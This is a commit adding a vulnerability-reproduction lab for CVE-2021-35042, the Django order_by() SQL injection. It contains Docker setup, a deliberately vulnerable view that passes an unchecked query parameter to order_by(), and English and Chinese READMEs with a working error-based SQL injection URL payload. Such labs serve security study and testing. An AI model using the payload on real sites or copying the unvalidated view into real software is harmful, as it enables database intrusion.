first commit

django/CVE-2021-35042/Dockerfile

@@ -0,0 +1,9 @@
+FROM vulhub/django:3.2.4
+
+COPY web/ /usr/src/
+COPY docker-entrypoint.sh /docker-entrypoint.sh
+RUN chmod +x /docker-entrypoint.sh
+
+WORKDIR /usr/src
+ENTRYPOINT [ "bash", "/docker-entrypoint.sh"]
+CMD [ "python", "app.py", "runserver", "0.0.0.0:8000" ]

django/CVE-2021-35042/README.md

@@ -0,0 +1,40 @@
+# Django QuerySet.order_by() SQL Injection (CVE-2021-35042)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Django is a high-level Python web framework that encourages rapid development and clean, pragmatic design.
+
+Django released a security update on July 1, 2021, which fixes a SQL injection vulnerability in the `QuerySet.order_by()` function. This vulnerability affects Django versions before 3.2.5, 3.1.13.
+
+The vulnerability can be exploited when a user has control over the input passed to the order_by() function, allowing for SQL injection at the expected column position.
+
+References:
+
+- <https://www.djangoproject.com/weblog/2021/jul/01/security-releases/>
+
+## Environment Setup
+
+Execute the following command to compile and start a vulnerable Django 3.2.4 server:
+
+```
+docker compose build
+docker compose up -d
+```
+
+After the server is started, you can access the Django home page at `http://your-ip:8000`.
+
+## Vulnerability Reproduction
+
+First, visit `http://your-ip:8000/vuln/` and add the parameter `order=-id` to see the data sorted by ID in descending order:
+
+![](1.png)
+
+To exploit the SQL injection vulnerability, modify the `order` parameter with the following payload, where `vuln_collection` is the model name:
+
+```
+http://your-ip:8000/vuln/?order=vuln_collection.name);select updatexml(1, concat(0x7e,(select @@version)),1)%23
+```
+
+The SQL error message will be displayed, revealing database information through the error-based SQL injection:
+
+![](2.png)

django/CVE-2021-35042/README.zh-cn.md

@@ -0,0 +1,38 @@
+# Django QuerySet.order_by()函数SQL注入漏洞（CVE-2021-35042）
+
+Django是一个高级的Python Web框架，支持快速开发和简洁实用的设计。
+
+Django在2021年7月1日发布了安全更新，修复了在QuerySet.order_by()函数中存在的SQL注入漏洞。该漏洞影响Django 3.2.5、3.1.13和2.2.24之前的版本。
+
+当用户可以控制传递给order_by()函数的输入时，可以在预期的列位置进行SQL注入攻击。
+
+参考链接：
+
+- <https://www.djangoproject.com/weblog/2021/jul/01/security-releases/>
+
+## 环境搭建
+
+执行如下命令编译并启动一个存在漏洞的Django 3.2.4服务器：
+
+```
+docker compose build
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:8000`即可看到Django默认首页。
+
+## 漏洞复现
+
+首先访问`http://your-ip:8000/vuln/`，并添加参数`order=-id`以查看按ID降序排序的数据：
+
+![](1.png)
+
+要利用SQL注入漏洞，使用以下payload修改`order`参数，其中`vuln_collection`是模型名称：
+
+```
+http://your-ip:8000/vuln/?order=vuln_collection.name);select updatexml(1, concat(0x7e,(select @@version)),1)%23
+```
+
+SQL错误信息将会显示，通过基于错误的SQL注入泄露数据库信息：
+
+![](2.png)

django/CVE-2021-35042/docker-compose.yml

@@ -0,0 +1,13 @@
+version: '2'
+services:
+  web:
+    build: .
+    ports:
+    - "8000:8000"
+    depends_on:
+    - db
+  db:
+   image: mysql:5.7
+   environment:
+    - MYSQL_ROOT_PASSWORD=mysql
+    - MYSQL_DATABASE=cve

django/CVE-2021-35042/docker-entrypoint.sh

@@ -0,0 +1,11 @@
+#!/bin/bash
+
+set -ex
+cd /usr/src
+
+wait-for-it.sh -t 0 db:3306 -- echo "mysql is up"
+
+python app.py migrate
+python app.py loaddata collection.json
+
+exec "$@"

django/CVE-2021-35042/web/app.py

@@ -0,0 +1,47 @@
+import os
+import sys
+
+
+os.environ.setdefault("DJANGO_SETTINGS_MODULE", __name__)
+BASE_DIR = os.path.dirname(os.path.abspath(__file__))
+DEBUG = True
+SECRET_KEY = 'vulhub'
+ALLOWED_HOSTS = ['*']
+MIDDLEWARE = [
+    'django.middleware.common.CommonMiddleware',
+]
+
+ROOT_URLCONF = 'vuln.urls'
+LOGGING = {
+    'version': 1,
+    'disable_existing_loggers': False,
+    'handlers': {
+        'console': {
+            'class': 'logging.StreamHandler',
+        },
+    },
+    'loggers': {
+        'django': {
+            'handlers': ['console'],
+            'level': os.getenv('DJANGO_LOG_LEVEL', 'WARNING'),
+        },
+    },
+}
+DATABASES = {
+    'default': {
+        'ENGINE': 'django.db.backends.mysql',
+        'NAME': 'cve',
+        'USER': 'root',
+        'PASSWORD': 'mysql',
+        'HOST': 'db',
+        'PORT': '3306',
+    }
+}
+INSTALLED_APPS = [
+    'vuln'
+]
+
+
+
+from django.core.management import execute_from_command_line
+execute_from_command_line(sys.argv)

django/CVE-2021-35042/web/collection.json

@@ -0,0 +1,30 @@
+[
+  {
+    "model": "vuln.collection",
+    "pk": 1,
+    "fields": {
+      "name": "Example 1"
+    }
+  },
+  {
+    "model": "vuln.collection",
+    "pk": 2,
+    "fields": {
+      "name": "Example 2"
+    }
+  },
+  {
+    "model": "vuln.collection",
+    "pk": 3,
+    "fields": {
+      "name": "Example 3"
+    }
+  },
+  {
+    "model": "vuln.collection",
+    "pk": 4,
+    "fields": {
+      "name": "Example 4"
+    }
+  }
+]

django/CVE-2021-35042/web/vuln/apps.py

@@ -0,0 +1,6 @@
+from django.apps import AppConfig
+
+
+class VulnConfig(AppConfig):
+    name = 'vuln'
+    default_auto_field = 'django.db.models.BigAutoField'

django/CVE-2021-35042/web/vuln/migrations/0001_initial.py

@@ -0,0 +1,21 @@
+# Generated by Django 3.1.4 on 2021-07-05 11:59
+
+from django.db import migrations, models
+
+
+class Migration(migrations.Migration):
+
+    initial = True
+
+    dependencies = [
+    ]
+
+    operations = [
+        migrations.CreateModel(
+            name='Collection',
+            fields=[
+                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
+                ('name', models.CharField(max_length=128)),
+            ],
+        ),
+    ]

django/CVE-2021-35042/web/vuln/models.py

@@ -0,0 +1,7 @@
+from django.db import models
+
+# Create your models here.
+
+
+class Collection(models.Model):
+    name = models.CharField(max_length=128)

django/CVE-2021-35042/web/vuln/urls.py

@@ -0,0 +1,7 @@
+from django.urls import include, path, re_path
+from . import views
+
+
+urlpatterns = [
+    path('vuln/', views.vul),
+]

django/CVE-2021-35042/web/vuln/views.py

@@ -0,0 +1,10 @@
+from django.shortcuts import HttpResponse
+from .models import Collection
+
+# Create your views here.
+
+
+def vul(request):
+    query = request.GET.get('order', default='id')
+    q = Collection.objects.order_by(query)
+    return HttpResponse(q.values())